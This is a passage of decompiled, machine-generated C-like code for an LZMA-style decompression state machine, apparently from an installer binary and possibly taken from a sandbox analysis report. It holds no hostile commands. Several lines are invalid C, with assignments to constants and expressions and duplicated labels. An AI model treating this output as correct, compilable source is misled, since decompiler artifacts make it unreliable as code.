                        						 *(_t621 - 0x58) = _t539;
                        						goto L68;
                        					} else {
                        						 *(__ebp - 0x84) = 8;
                        						while(1) {
                        							L132:
                        							 *(_t621 - 0x54) = _t614;
                        							while(1) {
                        								L133:
                        								_t540 =  *_t614;
                        								_t597 = _t540 & 0x0000ffff;
                        								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                        								if( *(_t621 - 0xc) >= _t573) {
                        									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                        									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                        									 *(_t621 - 0x40) = 1;
                        									_t541 = _t540 - (_t540 >> 5);
                        									 *_t614 = _t541;
                        								} else {
                        									 *(_t621 - 0x10) = _t573;
                        									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                        									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                        								}
                        								if( *(_t621 - 0x10) >= 0x1000000) {
                        									goto L139;
                        								}
                        								L137:
                        								if( *(_t621 - 0x6c) == 0) {
                        									 *(_t621 - 0x88) = 5;
                        									L170:
                        									_t576 = 0x22;
                        									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                        									_t544 = 0;
                        									L172:
                        									return _t544;
                        								}
                        								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                        								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                        								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                        								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                        								L139:
                        								_t542 =  *(_t621 - 0x84);
                        								while(1) {
                        									 *(_t621 - 0x88) = _t542;
                        									while(1) {
                        										L1:
                        										_t543 =  *(_t621 - 0x88);
                        										if(_t543 > 0x1c) {
                        											break;
                        										}
                        										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                        											case 0:
                        												if( *(_t621 - 0x6c) == 0) {
                        													goto L170;
                        												}
                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                        												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                        												_t543 =  *( *(_t621 - 0x70));
                        												if(_t543 > 0xe1) {
                        													goto L171;
                        												}
                        												_t547 = _t543 & 0x000000ff;
                        												_push(0x2d);
                        												asm("cdq");
                        												_pop(_t578);
                        												_push(9);
                        												_pop(_t579);
                        												_t617 = _t547 / _t578;
                        												_t549 = _t547 % _t578 & 0x000000ff;
                        												asm("cdq");
                        												_t612 = _t549 % _t579 & 0x000000ff;
                        												 *(_t621 - 0x3c) = _t612;
                        												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                        												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                        												_t620 = (0x300 << _t612 + _t617) + 0x736;
                        												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                        													L10:
                        													if(_t620 == 0) {
                        														L12:
                        														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                        														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                        														goto L15;
                        													} else {
                        														goto L11;
                        													}
                        													do {
                        														L11:
                        														_t620 = _t620 - 1;
                        														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                        													} while (_t620 != 0);
                        													goto L12;
                        												}
                        												if( *(_t621 - 4) != 0) {
                        													GlobalFree( *(_t621 - 4));
                        												}
                        												_t543 = GlobalAlloc(0x40, 0x600); // executed
                        												 *(_t621 - 4) = _t543;
                        												if(_t543 == 0) {
                        													goto L171;
                        												} else {
                        													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                        													goto L10;
                        												}
                        											case 1:
                        												L13:
                        												__eflags =  *(_t621 - 0x6c);
                        												if( *(_t621 - 0x6c) == 0) {
                        													 *(_t621 - 0x88) = 1;
                        													goto L170;
                        												}
                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                        												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                        												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                        												_t45 = _t621 - 0x48;
                        												 *_t45 =  *(_t621 - 0x48) + 1;
                        												__eflags =  *_t45;
                        												L15:
                        												if( *(_t621 - 0x48) < 4) {
                        													goto L13;
                        												}
                        												_t555 =  *(_t621 - 0x40);
                        												if(_t555 ==  *(_t621 - 0x74)) {
                        													L20:
                        													 *(_t621 - 0x48) = 5;
                        													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                        													goto L23;
                        												}
                        												 *(_t621 - 0x74) = _t555;
                        												if( *(_t621 - 8) != 0) {
                        													GlobalFree( *(_t621 - 8));
                        												}
                        												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                        												 *(_t621 - 8) = _t543;
                        												if(_t543 == 0) {
                        													goto L171;
                        												} else {
                        													goto L20;
                        												}
                        											case 2:
                        												L24:
                        												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                        												 *(_t621 - 0x84) = 6;
                        												 *(_t621 - 0x4c) = _t562;
                        												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                        												goto L132;
                        											case 3:
                        												L21:
                        												__eflags =  *(_t621 - 0x6c);
                        												if( *(_t621 - 0x6c) == 0) {
                        													 *(_t621 - 0x88) = 3;
                        													goto L170;
                        												}
                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                        												_t67 = _t621 - 0x70;
                        												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                        												__eflags =  *_t67;
                        												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                        												L23:
                        												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                        												if( *(_t621 - 0x48) != 0) {
                        													goto L21;
                        												}
                        												goto L24;
                        											case 4:
                        												L133:
                        												_t540 =  *_t614;
                        												_t597 = _t540 & 0x0000ffff;
                        												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                        												if( *(_t621 - 0xc) >= _t573) {
                        													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                        													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                        													 *(_t621 - 0x40) = 1;
                        													_t541 = _t540 - (_t540 >> 5);
                        													 *_t614 = _t541;
                        												} else {
                        													 *(_t621 - 0x10) = _t573;
                        													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                        													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                        												}
                        												if( *(_t621 - 0x10) >= 0x1000000) {
                        													goto L139;
                        												}
                        											case 5:
                        												goto L137;
                        											case 6:
                        												__edx = 0;
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__eax =  *(__ebp - 4);
                        													__ecx =  *(__ebp - 0x38);
                        													 *(__ebp - 0x34) = 1;
                        													 *(__ebp - 0x84) = 7;
                        													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                        													L132:
                        													 *(_t621 - 0x54) = _t614;
                        													goto L133;
                        												}
                        												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                        												__esi =  *(__ebp - 0x60);
                        												__cl = 8;
                        												__cl = 8 -  *(__ebp - 0x3c);
                        												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                        												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                        												__ecx =  *(__ebp - 0x3c);
                        												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                        												__ecx =  *(__ebp - 4);
                        												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                        												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                        												__eflags =  *(__ebp - 0x38) - 4;
                        												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        												if( *(__ebp - 0x38) >= 4) {
                        													__eflags =  *(__ebp - 0x38) - 0xa;
                        													if( *(__ebp - 0x38) >= 0xa) {
                        														_t98 = __ebp - 0x38;
                        														 *_t98 =  *(__ebp - 0x38) - 6;
                        														__eflags =  *_t98;
                        													} else {
                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                        													}
                        												} else {
                        													 *(__ebp - 0x38) = 0;
                        												}
                        												__eflags =  *(__ebp - 0x34) - __edx;
                        												if( *(__ebp - 0x34) == __edx) {
                        													__ebx = 0;
                        													__ebx = 1;
                        													goto L61;
                        												} else {
                        													__eax =  *(__ebp - 0x14);
                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        													__eflags = __eax -  *(__ebp - 0x74);
                        													if(__eax >=  *(__ebp - 0x74)) {
                        														__eax = __eax +  *(__ebp - 0x74);
                        														__eflags = __eax;
                        													}
                        													__ecx =  *(__ebp - 8);
                        													__ebx = 0;
                        													__ebx = 1;
                        													__al =  *((intOrPtr*)(__eax + __ecx));
                        													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                        													goto L41;
                        												}
                        											case 7:
                        												goto L0;
                        											case 8:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__eax =  *(__ebp - 4);
                        													__ecx =  *(__ebp - 0x38);
                        													 *(__ebp - 0x84) = 0xa;
                        													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                        												} else {
                        													__eax =  *(__ebp - 0x38);
                        													__ecx =  *(__ebp - 4);
                        													__eax =  *(__ebp - 0x38) + 0xf;
                        													 *(__ebp - 0x84) = 9;
                        													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                        													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                        												}
                        												while(1) {
                        													L132:
                        													 *(_t621 - 0x54) = _t614;
                        													goto L133;
                        												}
                        											case 9:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													goto L89;
                        												}
                        												__eflags =  *(__ebp - 0x60);
                        												if( *(__ebp - 0x60) == 0) {
                        													goto L171;
                        												}
                        												__eax = 0;
                        												__eflags =  *(__ebp - 0x38) - 7;
                        												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                        												__eflags = _t258;
                        												0 | _t258 = _t258 + _t258 + 9;
                        												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                        												goto L75;
                        											case 0xa:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__eax =  *(__ebp - 4);
                        													__ecx =  *(__ebp - 0x38);
                        													 *(__ebp - 0x84) = 0xb;
                        													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                        													while(1) {
                        														L132:
                        														 *(_t621 - 0x54) = _t614;
                        														goto L133;
                        													}
                        												}
                        												__eax =  *(__ebp - 0x28);
                        												goto L88;
                        											case 0xb:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__ecx =  *(__ebp - 0x24);
                        													__eax =  *(__ebp - 0x20);
                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        												} else {
                        													__eax =  *(__ebp - 0x24);
                        												}
                        												__ecx =  *(__ebp - 0x28);
                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        												L88:
                        												__ecx =  *(__ebp - 0x2c);
                        												 *(__ebp - 0x2c) = __eax;
                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        												L89:
                        												__eax =  *(__ebp - 4);
                        												 *(__ebp - 0x80) = 0x15;
                        												__eax =  *(__ebp - 4) + 0xa68;
                        												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                        												goto L68;
                        											case 0xc:
                        												L99:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0xc;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t334 = __ebp - 0x70;
                        												 *_t334 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t334;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												__eax =  *(__ebp - 0x2c);
                        												goto L101;
                        											case 0xd:
                        												L37:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0xd;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t122 = __ebp - 0x70;
                        												 *_t122 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t122;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												L39:
                        												__eax =  *(__ebp - 0x40);
                        												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                        													goto L48;
                        												}
                        												__eflags = __ebx - 0x100;
                        												if(__ebx >= 0x100) {
                        													goto L54;
                        												}
                        												L41:
                        												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                        												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                        												__ecx =  *(__ebp - 0x58);
                        												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                        												 *(__ebp - 0x48) = __eax;
                        												__eax = __eax + 1;
                        												__eax = __eax << 8;
                        												__eax = __eax + __ebx;
                        												__esi =  *(__ebp - 0x58) + __eax * 2;
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        												__ax =  *__esi;
                        												 *(__ebp - 0x54) = __esi;
                        												__edx = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													 *(__ebp - 0x40) = 1;
                        													__cx = __ax >> 5;
                        													__eflags = __eax;
                        													__ebx = __ebx + __ebx + 1;
                        													 *__esi = __ax;
                        												} else {
                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edx;
                        													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                        													__ebx = __ebx + __ebx;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													goto L39;
                        												} else {
                        													goto L37;
                        												}
                        											case 0xe:
                        												L46:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0xe;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t156 = __ebp - 0x70;
                        												 *_t156 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t156;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												while(1) {
                        													L48:
                        													__eflags = __ebx - 0x100;
                        													if(__ebx >= 0x100) {
                        														break;
                        													}
                        													__eax =  *(__ebp - 0x58);
                        													__edx = __ebx + __ebx;
                        													__ecx =  *(__ebp - 0x10);
                        													__esi = __edx + __eax;
                        													__ecx =  *(__ebp - 0x10) >> 0xb;
                        													__ax =  *__esi;
                        													 *(__ebp - 0x54) = __esi;
                        													__edi = __ax & 0x0000ffff;
                        													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        													__eflags =  *(__ebp - 0xc) - __ecx;
                        													if( *(__ebp - 0xc) >= __ecx) {
                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        														__cx = __ax;
                        														_t170 = __edx + 1; // 0x1
                        														__ebx = _t170;
                        														__cx = __ax >> 5;
                        														__eflags = __eax;
                        														 *__esi = __ax;
                        													} else {
                        														 *(__ebp - 0x10) = __ecx;
                        														0x800 = 0x800 - __edi;
                        														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        														__ebx = __ebx + __ebx;
                        														 *__esi = __cx;
                        													}
                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                        													 *(__ebp - 0x44) = __ebx;
                        													if( *(__ebp - 0x10) >= 0x1000000) {
                        														continue;
                        													} else {
                        														goto L46;
                        													}
                        												}
                        												L54:
                        												_t173 = __ebp - 0x34;
                        												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                        												__eflags =  *_t173;
                        												goto L55;
                        											case 0xf:
                        												L58:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0xf;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t203 = __ebp - 0x70;
                        												 *_t203 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t203;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												L60:
                        												__eflags = __ebx - 0x100;
                        												if(__ebx >= 0x100) {
                        													L55:
                        													__al =  *(__ebp - 0x44);
                        													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                        													goto L56;
                        												}
                        												L61:
                        												__eax =  *(__ebp - 0x58);
                        												__edx = __ebx + __ebx;
                        												__ecx =  *(__ebp - 0x10);
                        												__esi = __edx + __eax;
                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                        												__ax =  *__esi;
                        												 *(__ebp - 0x54) = __esi;
                        												__edi = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													_t217 = __edx + 1; // 0x1
                        													__ebx = _t217;
                        													__cx = __ax >> 5;
                        													__eflags = __eax;
                        													 *__esi = __ax;
                        												} else {
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edi;
                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        													__ebx = __ebx + __ebx;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													goto L60;
                        												} else {
                        													goto L58;
                        												}
                        											case 0x10:
                        												L109:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0x10;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t365 = __ebp - 0x70;
                        												 *_t365 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t365;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												goto L111;
                        											case 0x11:
                        												L68:
                        												_t614 =  *(_t621 - 0x58);
                        												 *(_t621 - 0x84) = 0x12;
                        												while(1) {
                        													L132:
                        													 *(_t621 - 0x54) = _t614;
                        													goto L133;
                        												}
                        											case 0x12:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__eax =  *(__ebp - 0x58);
                        													 *(__ebp - 0x84) = 0x13;
                        													__esi =  *(__ebp - 0x58) + 2;
                        													while(1) {
                        														L132:
                        														 *(_t621 - 0x54) = _t614;
                        														goto L133;
                        													}
                        												}
                        												__eax =  *(__ebp - 0x4c);
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                        												__ecx =  *(__ebp - 0x58);
                        												__eax =  *(__ebp - 0x4c) << 4;
                        												__eflags = __eax;
                        												__eax =  *(__ebp - 0x58) + __eax + 4;
                        												goto L130;
                        											case 0x13:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													_t469 = __ebp - 0x58;
                        													 *_t469 =  *(__ebp - 0x58) + 0x204;
                        													__eflags =  *_t469;
                        													 *(__ebp - 0x30) = 0x10;
                        													 *(__ebp - 0x40) = 8;
                        													L144:
                        													 *(__ebp - 0x7c) = 0x14;
                        													goto L145;
                        												}
                        												__eax =  *(__ebp - 0x4c);
                        												__ecx =  *(__ebp - 0x58);
                        												__eax =  *(__ebp - 0x4c) << 4;
                        												 *(__ebp - 0x30) = 8;
                        												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                        												L130:
                        												 *(__ebp - 0x58) = __eax;
                        												 *(__ebp - 0x40) = 3;
                        												goto L144;
                        											case 0x14:
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                        												__eax =  *(__ebp - 0x80);
                        												 *(_t621 - 0x88) = _t542;
                        												goto L1;
                        											case 0x15:
                        												__eax = 0;
                        												__eflags =  *(__ebp - 0x38) - 7;
                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        												__al = __al & 0x000000fd;
                        												__eax = (__eflags >= 0) - 1 + 0xb;
                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                        												goto L120;
                        											case 0x16:
                        												__eax =  *(__ebp - 0x30);
                        												__eflags = __eax - 4;
                        												if(__eax >= 4) {
                        													_push(3);
                        													_pop(__eax);
                        												}
                        												__ecx =  *(__ebp - 4);
                        												 *(__ebp - 0x40) = 6;
                        												__eax = __eax << 7;
                        												 *(__ebp - 0x7c) = 0x19;
                        												 *(__ebp - 0x58) = __eax;
                        												goto L145;
                        											case 0x17:
                        												L145:
                        												__eax =  *(__ebp - 0x40);
                        												 *(__ebp - 0x50) = 1;
                        												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                        												goto L149;
                        											case 0x18:
                        												L146:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0x18;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t484 = __ebp - 0x70;
                        												 *_t484 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t484;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												L148:
                        												_t487 = __ebp - 0x48;
                        												 *_t487 =  *(__ebp - 0x48) - 1;
                        												__eflags =  *_t487;
                        												L149:
                        												__eflags =  *(__ebp - 0x48);
                        												if( *(__ebp - 0x48) <= 0) {
                        													__ecx =  *(__ebp - 0x40);
                        													__ebx =  *(__ebp - 0x50);
                        													0 = 1;
                        													__eax = 1 << __cl;
                        													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                        													__eax =  *(__ebp - 0x7c);
                        													 *(__ebp - 0x44) = __ebx;
                        													while(1) {
                        														 *(_t621 - 0x88) = _t542;
                        														goto L1;
                        													}
                        												}
                        												__eax =  *(__ebp - 0x50);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        												__eax =  *(__ebp - 0x58);
                        												__esi = __edx + __eax;
                        												 *(__ebp - 0x54) = __esi;
                        												__ax =  *__esi;
                        												__edi = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													__cx = __ax >> 5;
                        													__eax = __eax - __ecx;
                        													__edx = __edx + 1;
                        													__eflags = __edx;
                        													 *__esi = __ax;
                        													 *(__ebp - 0x50) = __edx;
                        												} else {
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edi;
                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													goto L148;
                        												} else {
                        													goto L146;
                        												}
                        											case 0x19:
                        												__eflags = __ebx - 4;
                        												if(__ebx < 4) {
                        													 *(__ebp - 0x2c) = __ebx;
                        													L119:
                        													_t393 = __ebp - 0x2c;
                        													 *_t393 =  *(__ebp - 0x2c) + 1;
                        													__eflags =  *_t393;
                        													L120:
                        													__eax =  *(__ebp - 0x2c);
                        													__eflags = __eax;
                        													if(__eax == 0) {
                        														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                        														goto L170;
                        													}
                        													__eflags = __eax -  *(__ebp - 0x60);
                        													if(__eax >  *(__ebp - 0x60)) {
                        														goto L171;
                        													}
                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                        													__eax =  *(__ebp - 0x30);
                        													_t400 = __ebp - 0x60;
                        													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                        													__eflags =  *_t400;
                        													goto L123;
                        												}
                        												__ecx = __ebx;
                        												__eax = __ebx;
                        												__ecx = __ebx >> 1;
                        												__eax = __ebx & 0x00000001;
                        												__ecx = (__ebx >> 1) - 1;
                        												__al = __al | 0x00000002;
